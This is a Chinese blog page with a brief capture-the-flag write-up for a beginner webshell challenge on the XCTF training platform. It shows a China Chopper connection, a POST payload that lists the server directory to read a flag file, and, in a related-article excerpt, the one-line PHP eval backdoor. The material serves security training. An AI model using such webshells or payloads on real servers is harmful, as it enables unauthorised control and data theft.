攻防世界-web-新手练习区(3)

最新推荐文章于 2024-03-25 13:12:17 发布
最新推荐文章于 2024-03-25 13:12:17 发布
阅读量666 收藏 4
点赞数 1
分类专栏: CTF之Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wyj_1216/article/details/90513205
版权

0x01webshall

题目

10.ti

writeup

方法一
使用中国菜刀
10.1右键点击“添加”
10.2添加成功后,双击进入
10.3发现flag.txt,打开
10.5得到flag~

方法二
利用HackBar

shell=print_r(scandir(getcwd()));

可见flga.txt
10.6读取flag.txt
10.7得到flag~

知识点

1、中国菜刀的使用
2、print_r()
在这里插入图片描述scandir()
在这里插入图片描述在这里插入图片描述getcwd()
在这里插入图片描述

白衣w
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【愚公系列】2023年06月 攻防世界-Web(blgdel)
时光隧道
06-20 6973
PHP文件上传漏洞是指攻击者能够通过上传恶意文件来执行恶意代码,从而控制服务器或窃取敏感数据的安全漏洞。一般来说,攻击者会将一些包含恶意代码的文件伪装成图片、压缩包等常见格式的文件,骗取用户上传,进而向网站提交指定的文件名,替换掉原有的文件,造成恶意代码的执行,危害网站安全。攻击者可以通过以下方式来利用PHP文件上传漏洞:上传Webshell:攻击者可以上传包含恶意代码的Webshell,通过Webshell控制服务器,获取敏感信息,或者利用Webshell进行后续攻击。
攻防世界之ext3
金 帛的博客
03-22 754
攻防世界WP
CTF_WP-攻防世界web
最新发布
qq_63600223的博客
03-25 1984
目描述:想想初始页面?尝试访问index.php,没反应,返回结果一样用dirbuster扫描一下,发现果然有个index.php,并且大小跟1不一样,并且返回码是302再次尝试访问,还是不行搜索得知,302是被重定向了用burpsuit抓包发送,flag被隐藏,查看headerflag藏在报文头里备份文件搜索得知:php的备份有两种:.php~和.php.bak修改urlindex.php.bak自动下载了一个文件,打开发现flag打开链接是一个维基百科的说明,
【愚公系列】2021年12月 攻防世界-进阶-MISC-065(Excaliflag)
热门推荐
时光隧道
12-04 3万+
文章目录一、Excaliflag二、答步骤1.Stegsolve总结 一、Excaliflag 目链接:https://adworld.xctf.org.cn/task/task_list?type=misc&number=1&grade=1&page=4 二、答步骤 1.Stegsolve 打开Stegsolve加载png图片 调整色道找到flag flag为:3DS{Gr4b_Only_th1s_B1ts} 总结 Stegsolve功能介绍:Stegsolve软件是
攻防世界writeup——Web(持续更新)
Lethe's Blog
08-12 8079
lottery(XCTF 4th-QCTF-2018) 打开目先注册,然后发现flag可以购买。但得先去买彩票赢得足够的钱,七位数字的彩票,猜中的位数越多,赢得的钱越多,因此应该在买彩票这里出了一些漏洞。 1、首先访问目录robots.txt,存在.git泄露。 2、利用工具GitHack,得到网站源码: 3、进行代码审计,问出现在api.php里的buy函数,这个函数就是用来判断是否猜...
攻防世界web入门-webshell write up
m0_62851980的博客
03-29 386
目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 这重点在于对木马格式的了解和蚁剑的使用 打开网页页面只有一句话: 你会使用webshell吗? <?php @eval($_POST['shell']);?> 先来稍微了解一下木马:在php语言中,最简单的一句话木马语言为 : <?php @eval($_POST['attack']);?> 这句话中eval()函数表示括号内的语句字符串什么的全都当做代码执行,@表示后面..
攻防世界Training-Stegano-1
10-31
攻防世界Training-Stegano-1,misc。 此详细解博客:https://blog.csdn.net/m0_59188912/article/details/127614642
2020-10-15-web新手.md
01-24
攻防世界web新手
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此详细解博客:https://blog.csdn.net/m0_59188912/article/details/127615829
level0 -- 攻防世界新手
01-19
来自攻防世界的pwn,是一道简单的新手样本目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问。漏洞利用问解决链接:...
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此详细解博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界 Misc高手进阶 3分 肥宅快乐
闵行小鱼塘
11-07 1330
继续ctf的旅程,攻防世界Misc高手进阶的3分,本篇是肥宅快乐的writeup
攻防世界web新手合集
CNXBDSa的博客
08-07 3179
攻防世界(xctf)做合集-get_post- robots-backup-cookie-disabled_button-simple_php-weak_auth-xff_referer-simple_js-command_execution 注意有些需要直接实践-不去实践永远别想进步 1.view_source 打开 然后查看源代码就找到flag了 cyberpeace{32b6a4b190...
攻防世界-Misc-新手练习记录
Sea_Sand息禅
04-13 1万+
ext3 下载文件,文件名是Linux,拿到kali中看下文件类型: ext3就是Linux的一个文件系统,strings查看一下有没有flag这样的字符串: flag应该就在这个flag.txt中了,把这个文件系统挂载到Linux上: mount linux /mnt 挂上去之后看一下/mnt/下的文件,用命令ls -al /mnt/,可以看到上面strings查找到的O7...
攻防世界记录MISC
T19er的博客
07-07 1419
MISC 0x00 签到 是一道SSCTF-2017的目 (Z2dRQGdRMWZxaDBvaHRqcHRfc3d7Z2ZoZ3MjfQ==)base64解密ggQ@gQ1fqh0ohtjpt_sw{gfhgs#} 凯撒密码 ssC@sC1rct0atfvbf_ei{srtse#} 0x01 3DS{Gr4b_Only_th1s_B1ts} ...
攻防世界webweb shell关卡使用中国蚁剑
Lu__xiao的博客
11-30 866
访问web shell关卡进入此网站,得到下面一句话 打开蚁剑,右击空白,添加数据 URL 填写网站地址 密码shell 点击添加 连接后在网站目录下可以看到 flag.txt文件 里面放置flag index.php文件 里面放置网站源代码 源代码 flag:cyberpeace{7d9b52e47e2e775606e7c143f55b398c} webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种...
攻防世界 - MISC - 001 - this_is_flag
Ewige的博客
07-05 357
攻防世界 - MISC - 01 - this_is_flag 这里写目录标思路知识点所需工具反思心得 审 思路 ????原来flag是长这样的啊 flag{xxx},还给了一个例子,真贴心,但是在哪呢,唉!一开始就给我来一个下马威,搞不了了,就用例子试试吧! 知识点 考察选手对flag的敏感度 所需工具 无 反思心得 有时候答案就在你的眼前,不要犹豫大胆的去尝试! ...
攻防世界MISC进阶之Excaliflag
harry_c的博客
08-09 1195
攻防世界MISC进阶之Excaliflag第一步:分析第二步:实操第三步:答案 第一步:分析 难度系数:1星 目来源: 3dsctf-2016 目描述:只有一个真正的黑客可以从这个地方得到flag。 开始想着使用foremost隐藏文件分离工具试试,结果并没有发现什么可疑的地方。 突然想到之前做过的类似的目,使用stegsolve图片查看器能够看到图片的每一帧已经各种变换后的细节。 第二步:...
攻防世界-Misc-hit-the-core(strings使用、密码规律观察)
Sea_Sand息禅
04-26 3649
strings查看字符串,好像还真得到一个有用的串: 这个串挺长的,{}的位置正确,凯撒、栅栏就别想了,能不能从串本身找到规律? 仔细观察,发现前面部分的大写字母拼起来正好是ALEXCTF,而且每个字母之间隔了4个字母,写个脚本提取一下: data = 'cvqAeqacLtqazEigwiXobxrCrtuiTzahfFreqc{bnjrKwgk83kgd43j85ePgb_e_r...
攻防世界---Web---新手模式---backup
11-11
目描述:在攻防世界Web新手模式中,有一道名为backup的目。该目要求找到备份文件并获取flag。可以通过访问http://your-ip/backup/来查看备份文件,但是需要密码才能访问。我们可以通过查看网页源代码或者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值